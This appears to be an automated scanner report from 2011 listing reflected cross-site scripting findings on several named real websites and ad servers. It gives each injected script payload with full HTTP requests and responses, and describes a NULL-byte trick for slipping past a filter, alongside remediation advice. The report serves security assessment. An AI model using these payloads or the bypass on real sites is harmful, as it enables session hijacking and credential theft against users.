Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc7e6<img%20src%3da%20onerror%3dalert(1)>ac1cc16112d was submitted in the REST URL parameter 1. This input was echoed as dc7e6<img src=a onerror=alert(1)>ac1cc16112d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /quotetoolsdc7e6<img%20src%3da%20onerror%3dalert(1)>ac1cc16112d/clientForward HTTP/1.1 Host: app.quotemedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 7bb68<script>alert(1)</script>56b71eeb362 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction7bb68<script>alert(1)</script>56b71eeb362&n=ar_int_p85001580&1296491560510 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 16:32:02 2011&prad=58087570&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491524%2E335%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:01 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload f00d0<script>alert(1)</script>4ba25d4dfdf was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359f00d0<script>alert(1)</script>4ba25d4dfdf HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:05 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:05 2011&recExp=Mon Jan 31 17:09:05 2011&prad=264243128&arc=186035359f00d0%3Cscript%3Ealert%281%29%3C%2Fscript%3E4ba25d4dfdf&; expires=Sun 01-May-2011 17:09:05 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296493745; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25241
The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload ce57c<script>alert(1)</script>1e6668e0674 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128ce57c<script>alert(1)</script>1e6668e0674&AR_C=186035359 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:04 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:04 2011&recExp=Mon Jan 31 17:09:04 2011&prad=264243128ce57c%3Cscript%3Ealert%281%29%3C%2Fscript%3E1e6668e0674&arc=186035359&; expires=Sun 01-May-2011 17:09:04 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296493744; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25200
1.5. http://blog.sherifmansour.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.sherifmansour.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f455"><script>alert(1)</script>18723730872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f455\"><script>alert(1)</script>18723730872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9f455"><script>alert(1)</script>18723730872=1 HTTP/1.1 Host: blog.sherifmansour.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:20:00 GMT Server: Apache X-Pingback: http://blog.sherifmansour.com/xmlrpc.php Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 105461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <a href="http://blog.sherifmansour.com/?9f455\"><script>alert(1)</script>18723730872=1&paged=2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005f73f"><script>alert(1)</script>261222dadcb was submitted in the REST URL parameter 1. This input was echoed as 5f73f"><script>alert(1)</script>261222dadcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%005f73f"><script>alert(1)</script>261222dadcb HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2f4"><script>alert(1)</script>09dd599035 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMca2f4"><script>alert(1)</script>09dd599035/2010DM/11768404287@x23?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78496"><script>alert(1)</script>be0a7656f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM78496"><script>alert(1)</script>be0a7656f5/11768404287@x23?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:23 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f63fa"><script>alert(1)</script>3687d15fefd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/11768404287@x23f63fa"><script>alert(1)</script>3687d15fefd?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64b0"><script>alert(1)</script>1398b99ec43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMd64b0"><script>alert(1)</script>1398b99ec43/2010DM/1772729617@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75644"><script>alert(1)</script>cd999b58b78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM75644"><script>alert(1)</script>cd999b58b78/1772729617@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dec1f"><script>alert(1)</script>7522f40b207 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1772729617@x23dec1f"><script>alert(1)</script>7522f40b207?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:29 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc89"><script>alert(1)</script>015ecd77db8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM1cc89"><script>alert(1)</script>015ecd77db8/2010DM/1990402400@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f88a5"><script>alert(1)</script>a0d712db7ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMf88a5"><script>alert(1)</script>a0d712db7ee/1990402400@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2110c"><script>alert(1)</script>f165b1bce56 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1990402400@x232110c"><script>alert(1)</script>f165b1bce56?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:24 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/
1.16. http://goop.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://goop.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a5c"><script>alert(1)</script>29cbc4784fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?66a5c"><script>alert(1)</script>29cbc4784fc=1 HTTP/1.1 Host: goop.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8ea7<script>alert(1)</script>7d0af9d8db0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
